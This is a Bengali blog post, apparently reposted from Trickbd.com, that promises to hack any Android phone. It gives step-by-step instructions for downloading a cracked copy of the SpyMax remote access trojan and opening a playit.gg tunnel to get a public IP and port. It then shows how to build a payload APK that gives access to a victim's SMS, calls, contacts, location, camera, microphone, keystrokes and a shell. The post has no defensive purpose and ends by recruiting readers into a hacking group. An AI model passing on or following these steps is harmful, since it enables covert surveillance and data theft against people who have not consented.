যেকোন android ফোন হ্যাক করেন খুব সহজে with port forwarding ( PC)

Howdy ,

আজকে আপনাদের সামনে হাজির হলাম android rat নিয়ে । আজকে যে রাট দেখাবো সেটা অনেকেই জানেন আবার অনেকেও জানেন না , যারা জানেন না তাদের জন্য হেল্প হবে আশা করি ।

আজকে রাট এর নাম হচ্ছে spymax  । এটা ব্যবহার করার জন্য আপনাকে pc লাগবে ।

rat কি ? , rat কিভাবে কাজ করে সবাই কম বেশি জানি তাই বিস্তারিত আলোচনা করছি না ।

Spymax : 

  • File manager
  • sms manager
  • calls manager
  • contacts manager
  • location manager
  • account manager
  • camera manager ( front , back )
  • sell terminal
  • information
  • applications
  • microphone
  • call phone
  • clipboard
  • keylogger
  • serber ( etc) .

এই গুলো সব access পাবেন ।

Download 

pass: Trickbd.com/abrno34

তো চলুন শুরু করা যাক কিভাবে কি করতে হবে । আমার দেওয়া লিঙ্ক থেকে ডাউনলোড করে নিবেন । zip ফাইল extract করে নিবেন ।

প্রথমে এই একম ৩ টা software পাবেন ইন্সটল করে নিবেন , তা না হলে যে কোন ধরেনের সমস্যা দেখা দিতে পারে । তাছাড়া এই ৩ টা ছাড়া আর ও ২ টা ইন্সটল করতে হবে

১ . don net framework 4  download ( 4 এর উপরে রাখবেন )

2. java latest version

zip  ফাইল extract করবেন ।

spymax exe software ডাবল ক্লিক করে ওপেন করবেন এই গুলো protable  version ।

লগইন ক্লিক করবেন ( এইটা crack version আশা করি কোন ধরেন সমস্যা হবে না )

আমি port forwading করে দেখাবো তাই পাবলিক আইপি নিতে হবে তার জন্য আমি playit.gg চলে যাবো আর software টি  ডাউনলোড করে নিবো ।

তারপর ইন্সটল করে নিবো  ।

apps উপেন করলে এই রকম একটা লিঙ্ক পাবো কপি করে নিবো ।

যেকোন ব্রাউজার দিয়ে লিঙ্কটি ওপেন করবো । তারপর create an account ক্লিক করবো । email or pass account করে নিবেন । ( চাইলে temp mail ব্যবহার করতে পারেন ) mail এ একটা ভেরিফাই লিঙ্ক যাবে ভেরিফাই করে নিবেন ।

একটু ওয়েট করতে বলবে ।

tunnels ক্লিক করবো । add tunnel

tunnel type দিবো TCP-UDP পোর্ট আপনার মনের মতো করে দিতে পারবেন ( আর এই পোর্ট পরে কাজে লাগবে ) তারপর add tunnel ক্লিক করবো ।

 

এই রকম আসলে বুঝবেন আপনার আইপি পোর্ট forwading এর জন্য রেডি , এখানে public address নিচে যেটা দেখতে পাচ্ছেন সেটাই আপনার পাবলিক আইপি ।

 

spymax ওপেন হলে এই রকম পোর্ট চাইবে , এখানে আপনি অই পোর্ট টা দিবেন যেটা আমরা পাবলিক আইপি করার সময় দিয়েছিলাম , পোর্ট দিয়ে add ক্লিক করবো ।

রাট বানানোর জন্য build click করবো ।

connection > dns/ip এই খানে আমরা যে একটু আগে পাবলিক আইপি পেলাম সেটা দিবো । পোর্ট এখানে আইপির পরের পোর্ট দিয়ে দিবেন তারপর add click করবেন ।

installation or icon & marging নিজের মতো করে customize করে নিবেন ।

এখন build a click করবে আপনাকে একটা app সিলেক্ট করতে বলবে , আপনি spymax folder এ apps টি পেয়ে যাবেন ।

payload build হচ্ছে

payload রেডি এখন যেকোন ফোনে ইন্সটল করে just one click করবেই হবে ।

দেখতে পাচ্ছেন আমার ফোন চলে আচ্ছে ।

 

 

 

boom enjoy

তো আজকে এই পযন্ত ভালো থাকবেন সুস্থ থাকবেন আল্লাহ হাফেজ ।

যারা এই রকম hacking , cracking , শিখতে চান তারা আমার telegram a join হতে পারেন । 

Telegram

Facebook

Youtube

The post যেকোন android ফোন হ্যাক করেন খুব সহজে with port forwarding ( PC) appeared first on Trickbd.com.



from Trickbd.com https://ift.tt/eEYqNmw
Post a Comment (0)
Previous Post Next Post